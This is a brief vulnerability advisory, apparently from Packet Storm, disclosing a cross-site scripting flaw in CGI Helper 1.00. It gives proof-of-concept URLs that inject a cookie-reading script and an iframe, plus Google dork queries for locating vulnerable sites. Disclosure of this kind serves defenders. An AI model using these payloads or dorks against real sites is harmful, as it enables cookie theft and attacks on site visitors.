CGI Helper version 1.00 suffers from a cross site scripting vulnerability.
947c083d30d0cc6d27c6403332bd1b2452721a1bf9387767228b4021aaf2e122## CGI Helper 1.00 ##
## Download: http://www.sourcecodeonline.com/details/cgi_helper.html ##
## Discovered by: Paulo Santos ##
## Contact: paulo@infocampoap.com.br ##
## Blog: http://infocampo.wordpress.com ##
The script CGI Helper 1.00 is vulnerable to XSS.
Example:
www.site.com/cgi-bin/helper.cgi
XSS:
www.site.com/cgi-bin/helper.cgi/>’><script>alert(document.cookie)</script>
or
Example:
http://www.site.com/cgi-bin/cgihelper.pl
XSS:
http://www.site.com/cgi-bin/cgihelper.pl/>’><script>alert(document.cookie)</script>
The script makes infinite iframes that can affect the user:
http://www.site.com/cgi-bin/helper.cgi/>’><iframe src=http://www.google.com.br>
or
http://www.site.com/cgi-bin/cgihelper.pl/>’><iframe src=http://www.google.com.br>
Google dork:
inurl:cgihelper.pl
inurl:cgi-bin/helper.cgi
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed